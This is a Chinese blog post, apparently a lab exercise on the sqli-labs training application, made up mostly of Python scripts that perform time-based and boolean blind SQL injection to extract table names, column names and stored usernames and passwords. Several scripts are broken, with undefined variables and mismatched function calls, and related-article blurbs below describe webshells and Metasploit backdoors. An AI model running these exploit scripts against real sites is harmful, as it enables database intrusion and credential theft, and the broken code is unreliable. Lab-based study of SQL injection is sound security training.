时间盲注&Boolen盲注 获取表、列、具体数据的函数

最新推荐文章于 2025-07-30 20:40:02 发布
原创 最新推荐文章于 2025-07-30 20:40:02 发布 · 280 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #数据库 #开发语言

时间盲注

获取表

import requests
import time

# 目标URL
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# 延迟时间(用于判断是否触发SLEEP)
delay = 2
# 最大表名长度
max_table_length = 30
# ASCII码范围(可打印字符)
ascii_range = range(32, 127)

def is_injected(payload):
    """
    判断是否触发时间延迟
    :param payload: 注入的SQL语句
    :return: 如果触发延迟,返回True;否则返回False
    """
    try:
        # 记录请求开始时间
        start = time.time()
        # 发送请求,设置超时时间为delay + 1秒
        requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
        # 计算请求耗时
        request_time = time.time() - start
        # 如果请求时间超过delay,则认为触发延迟
        return request_time > delay
    except requests.exceptions.Timeout:
        # 如果请求超时,直接认为触发延迟
        return True
    except requests.exceptions.RequestException as e:
        # 处理其他请求异常(如网络错误)
        print(f"请求失败: {e}")
        return False

def extract_table_name():
    """
    提取数据库中的第一个表名
    :return: 提取到的表名
    """
    table_name = []
    # 遍历表名的每个字符位置
    for pos in range(1, max_table_length + 1):
        # 遍历ASCII码范围
        for c in ascii_range:
            # 构造Payload,测试当前字符是否匹配
            payload = f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
            # 如果触发延迟,说明当前字符匹配
            if is_injected(payload):
                table_name.append(chr(c))  # 将字符加入表名列表
                print(f"当前表名: {''.join(table_name)}")  # 打印当前已提取的表名
                break
        else:
            # 如果内层循环未找到匹配字符,说明表名已提取完毕
            break
    return ''.join(table_name)

if __name__ == "__main__":
    # 提取表名并输出
    table_name = extract_table_name()
    print(f"最终提取的表名: {table_name}")

获取列

同上

def get_column_name(url, table_name, delay):
    """
    此函数用于通过基于时间的盲注技术获取指定表的第一个列名。
    :param url: 目标 URL,即存在 SQL 注入漏洞的页面地址
    :param table_name: 要查询列名的表名
    :param delay: 设定的延迟时间,用于判断是否触发了 SLEEP 函数
    :return: 返回获取到的列名
    """
    column = []  # 用于存储获取到的列名的字符列表
    for position in range(1, 30):  # 遍历可能的字符位置,最多尝试 30 个字符
        found = False  # 标记是否找到当前位置的字符
        for ascii_code in range(32, 127):  # 遍历 ASCII 码范围从 32 到 126 的字符
            # 构造注入载荷,使用 IF 语句判断指定位置的字符的 ASCII 码是否等于当前字符的 ASCII 码
            # 如果相等,则执行 SLEEP 函数,否则返回 0
            payload = f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT 1),{position},1))={ascii_code},SLEEP({delay}),0)"
            if is_injected(url, payload, delay):  # 调用 is_injected 函数判断注入是否成功
                column.append(chr(ascii_code))  # 如果注入成功,将当前字符添加到 column 列表中
                print("".join(column))  # 打印当前已获取到的列名
                found = True  # 标记已找到当前位置的字符
                break  # 跳出内层循环,继续尝试下一个位置的字符
        if not found:
            # 如果内层循环没有找到匹配的字符,说明已经获取到完整的列名,跳出外层循环
            break
    return ''.join(column)  # 返回最终获取到的列名

if __name__ == "__main__":
    # 目标 URL,指向存在 SQL 注入漏洞的页面
    target_url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
    # 设置延迟时间,用于判断是否触发了 SLEEP 函数
    sleep_delay = 2
    # 指定要查询列名的表名
    target_table_name = "emails"
    # 调用 get_column_name 函数获取列名
    column_name = get_column_name(target_url, target_table_name, sleep_delay)
    print(f"获取到的列名是: {column_name}")

获取具体数据

def get_first_row_data():
    """
    此函数用于通过基于时间的盲注技术获取指定表和列的第一行数据。
    :return: 返回获取到的第一行数据
    """
    data = []  # 用于存储获取到的数据的字符列表
    for position in range(1, 50):  # 遍历可能的字符位置,最多尝试 50 个字符
        found = False  # 标记是否找到当前位置的字符
        for ascii_code in range(32, 127):  # 遍历 ASCII 码范围从 32 到 126 的字符
            # 构造注入载荷,使用 IF 语句判断指定位置的字符的 ASCII 码是否等于当前字符的 ASCII 码
            # 如果相等,则执行 SLEEP 函数,否则返回 0
            payload = f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),{position},1))={ascii_code},SLEEP({delay}),0)"
            if is_injected(payload):  # 调用 is_injected 函数判断注入是否成功
                data.append(chr(ascii_code))  # 如果注入成功,将当前字符添加到 data 列表中
                print("".join(data))  # 打印当前已获取到的数据
                found = True  # 标记已找到当前位置的字符
                break  # 跳出内层循环,继续尝试下一个位置的字符
        if not found:
            # 如果内层循环没有找到匹配的字符,说明已经获取到完整的数据,跳出外层循环
            break
    return ''.join(data)  # 返回最终获取到的数据

	print(''.join(data))

布尔盲注

获取表

import requests

# 常量定义,提高代码的可维护性

url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'

payload = 'and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \
          'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
ASCII_LIST = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,
              72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,
              104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
SUCCESS_STR = "You are in..........."
SUCCESS_BYTES = bytes(SUCCESS_STR, 'utf-8')
TABLE_COUNT = 4
CHAR_COUNT = 10

def get_table_names():
    """
    通过 SQL 盲注获取数据库的前四个表名
    :return: 包含四个表名的列表
    """
    table_names = [''] * TABLE_COUNT  # 初始化一个包含四个空字符串的列表,用于存储表名
    for table_index in range(TABLE_COUNT):
        for char_index in range(1, CHAR_COUNT + 1):
            for ascii_code in ASCII_LIST:
                # 格式化 Payload
                payload = PAYLOAD_TEMPLATE.format(t=table_index, w=char_index, A=ascii_code)
                try:
                    # 发送请求
                    response = requests.get(TARGET_URL + payload)
                    if SUCCESS_BYTES in response.content:
                        # 将匹配到的字符添加到对应的表名中
                        table_names[table_index] += chr(ascii_code)
                        print(f"正在对比第{table_index + 1}个表, 第{char_index}个字符, 当前表名: {table_names[table_index]}")
                        break
                except requests.RequestException as e:
                    # 处理请求异常
                    print(f"请求发生错误: {e}")
    return table_names

if __name__ == "__main__":
    table_names = get_table_names()
    for i, table_name in enumerate(table_names, start=1):
        print(f'tables{i} --> {table_name}')

获取列

import requests

# 定义常量,提高代码可维护性
CHAR_LIST = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
             'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
             'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
             'Z', '.']

url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \
          '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'

SUCCESS_MSG = 'You are in...........'
SUCCESS_BYTES = bytes(SUCCESS_MSG, 'utf-8')
COLUMN_COUNT = 5  # 要获取的列名数量
MAX_CHAR_LENGTH = 8  # 每个列名最多尝试的字符长度

def get_column_names():
    """
    通过 SQL 盲注获取指定表的列名
    :return: 包含列名的列表
    """
    columns = [''] * COLUMN_COUNT  # 初始化列名列表
    for column_index in range(COLUMN_COUNT):
        for char_index in range(1, MAX_CHAR_LENGTH + 1):
            for char in CHAR_LIST:
                # 格式化 Payload
                payload = PAYLOAD_TEMPLATE.format(w=column_index, n=char_index, c=columns[column_index] + char)
                try:
                    # 发送请求
                    response = requests.get(TARGET_URL + payload)
                    if SUCCESS_BYTES in response.content:
                        # 若响应中包含成功信息,更新列名
                        columns[column_index] += char
                        print(f'正在对比第 {column_index + 1} 个字段第 {char_index} 个字符: {columns[column_index]}')
                        break
                except requests.RequestException as e:
                    # 处理网络请求异常
                    print(f'网络请求出错: {e}')
    return columns

if __name__ == "__main__":
    column_names = get_column_names()
    for i, column_name in enumerate(column_names, start=1):
        print(f'column {i} --> {column_name}')

获取具体数据


CHAR_LIST = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
         'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
         'Z', '.']
         
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'

def get_field_values(field_name):
    """
    通过 SQL 盲注获取指定字段的值
    :param field_name: 要获取的字段名,如 'username' 或 'password'
    :return: 包含该字段值的列表
    """
    values = [''] * RECORD_COUNT
    payload_template = f'%20and%20left((select%20{field_name}%20from%20users%20where%20id%20={{n}}),{{w}})=%27{{d}}%27%20--%20k'
    for record_index in range(1, RECORD_COUNT + 1):
        for char_index in range(1, CHAR_LENGTH + 1):
            for char in CHAR_LIST:
                payload = payload_template.format(n=record_index, w=char_index, d=values[record_index - 1] + char)
                try:
                    response = requests.get(TARGET_URL + payload)
                    if SUCCESS_BYTES in response.content:
                        values[record_index - 1] += char
                        print(f'正在对比第 {record_index} 个记录的 {field_name} 的第 {char_index} 个字符: {values[record_index - 1]}')
                        break
                except requests.RequestException as e:
                    print(f'网络请求出错: {e}')
    return values

if __name__ == "__main__":
    # 获取 username 字段的值
    usernames = get_field_values('username')
    # 获取 password 字段的值
    passwords = get_field_values('password')

    print('id    username    password')
    for i in range(RECORD_COUNT):
        print(f'{i + 1} - {usernames[i]} - {passwords[i]}')
Sesessep
关注
Dnslog时间盲注)less-9-10
01mx的博客
03-26 502
Dnslog入原理 代码虽然存在sql入,然而页面不会回显数据,也不会回显错误信息。 通过布尔入,和时间盲注都可以获取到内容,但是整个过程效率低,需要发很多请求判断。可能会触发安全设备。 这里我们我们需要一种方式,减少请求,直接回显数据,这里可以使用dnslog入 dnslog平台 http://ceye.io dns在解析是会留下日志,通过读取多级域名的解析日志获取请求信息 知识扩展 首先说明,dns带外查询属于MySQL入,在MySQL中有个系统属性 secure_file_priv特性,有
SQL——时间盲注,dnslog
mikeyning的博客
10-27 316
SQL——时间盲注,dnslog 时间盲注 时间盲注原理 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo 'You are in...........'; } else { echo 'You are in...........';
SQL入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 5014
Less-9 基于时间的双引号
时间盲注&Boolen获取具体数据函数
GaoXianGaoXian的博客
02-13 352
时间盲注&Boolen获取具体数据函数
时间盲注和boolen获取以及具体数据函数
Eoip_zacb的博客
02-13 499
这些函数通常用于SQL入攻击中,目的是从目标数据库提取信息。用于获取数据库名称,和分别用于基于时间和布尔的攻击,getTable和getColumn用于获取名和名,getResult用于获取中的数据。这些函数的实现逻辑都依赖于构造特定的SQL查询,并通过观察数据库的响应来推断出所需的信息。
时间盲注,boolen获取具体数据函数
yhahab的博客
02-13 212
【代码】时间盲注,boolen获取具体数据函数
时间盲注,boolen,后面几个获取具体数据函数补全
m0_74259494的博客
02-13 779
在SQL中,`DNSLOG`和`SQLMap`是两种常用的工具,它们可以结合使用来实现数据的外带和入。以下是关于这两种工具结合使用的详细说明:1.DNSLOG在SQL中的应用DNSLOG是一种通过DNS查询来记录数据的技术,常用于无回显的漏洞利用场景,如SQL。在SQL中,攻击者可以通过构造特殊的SQL语句,将数据通过DNS查询发送到攻击者控制的DNS服务器上。
时间盲注,boolen获取具体数据函数
huangheping0803的博客
02-13 421
【代码】时间盲注,boolen获取具体数据函数
sql:时间盲注和boolen
2201_75588145的博客
02-13 399
关于时间盲注,boolen的后面几个获取具体数据函数补全。
sql 返回值boolen
03-14
例如,在获取单行数据作为数组之后,可以根据该行是否存在有效条目来推断查询结果的状态: ```php $rows = mysqli_fetch_row($res); if ($rows !== null && count($rows) > 0){ echo 'Query returned at least one...
Red靶机攻略
duanjiaxu6666的博客
07-27 1404
使用php伪协议访问:http://redrocks.win/NetworkFileManagerPHP.php?建立pass.txt文件,将之前配置文件那个密码放入,然后利用hashcat对应的base64规则去枚举相关的密码,存入passlist.txt中,格式是类似于之前获得的那个密码的,最好利用hydra进行爆破,获得对应的密码。
自定义定时任务功能详解
weixin_52673410的博客
07-26 942
• 灰度验证:新任务首次运行建议设置1分钟间隔,观察日志无误后再调整周期 • 异常处理:在代码中增加try-catch模块,防止单次失败导致任务中断 • 资源监控:通过php think timer status查看任务进程资源占用。• 系统任务:预置10种常用任务(如订单自动确认、优惠券过期提醒等),支持开关控制与周期调整 • 自定义任务:开发者可自由创建个性化任务,满足特殊业务需求。• 执行周期:支持秒/分/时/天/周/月/年七种粒度 示例:选择"每10秒执行" → 系统自动显示周期说明文字 •。
red靶场
m0_75212639的博客
07-27 476
状态码为500猜测这个页面可能存在漏洞,使用wfuzz测试一下参数,字典也用github上面提供的字典文件,路径换自己上传文件的地址。下载一下,导入到kali中 命令需要修改文件地址,变为你字典放到kali的位置。前面得出hashcat,将密码保存到pass.txt文件使用hashcat规则进行破解。经过查询,Mr. Miessler是github上的一个字典。先写一个pass.txt,将密码保存到当前路径,再执行命令。页面,进行访问,发现是一片空白,说明存在这个页面。
Android-广播详解
2401_87366139的博客
07-26 978
分类:标准广播是一个完全异步执行的广播,几乎同时的接收器会收到这个广播,效率比较高,无法截断;有序广播是同步执行,同一时刻只有一个接受器才能接受到消息,优先级高的接收器先接受到,同时也可以进行截断。
PHP】几种免费的通过IP获取IP所在地理位置的接口(部分免费部分收费)
qq_25285531的博客
07-29 268
整理收集了几种通过IP地址获取所在地理位置的接口,部分免费,部分有次数限制。
​Metasploit简介
qq_40379132的博客
07-29 846
本文详细介绍了Metasploit框架的六大核心模块及其渗透测试流程:1. 辅助模块(扫描识别)2. 漏洞利用模块(攻击代码)3. 载荷模块(植入代码)4. 后渗透模块(信息收集)5. 编码模块(免杀处理)。重点演示了针对Linux系统Samba服务的完整攻击链,包括端口扫描、漏洞利用、权限提升(提权至system)、凭证窃取(Hashdump/Mimikatz)以及后门植入技术。文章还系统介绍了Windows/Linux平台下多种后门生成方法(exe/dll/ps1等),并详细讲解了进程迁移、日志清理等后
攻防世界-引导-Web_php_unserialize
weixin_51334173的博客
07-28 207
出现一段源代码,分段分析。
php中ssti模板入讲解】
My笔记的博客
07-28 799
本文分析了PHP中Smarty和Twig模板的安全机制及SSTI漏洞利用方法。首先介绍了两种模板通过白名单机制限制函数执行的安全措施,然后详细剖析了针对Smarty模板的SSTI漏洞利用过程,包括版本探测、payload构造和命令执行。文章通过一个实际案例展示了如何通过二次入触发SSTI漏洞,并最终实现远程代码执行(RCE)。案例中演示了绕过SQL入过滤、构造16进制payload以及通过GET参数执行系统命令的全过程,为模板安全研究和渗透测试提供了实用参考。
常见的cms框架的webshell方法
最新发布
m0_65939400的博客
07-30 219
进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装#执⾏命令#靶场地址思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外观】 --》 【编辑】 --》 404.php在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮访问以下连接即可获取WebShell#拼接路径。
时间盲注,boolenpython
02-14
### 关于SQL入的时间盲注和布尔 #### 布尔的原理与Python实现 在布尔中,攻击者通过发送不同的SQL查询并分析应用返回的结果页面是否发生变化来判断条件语句真假。如果条件成立,则示存在漏洞;反之...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值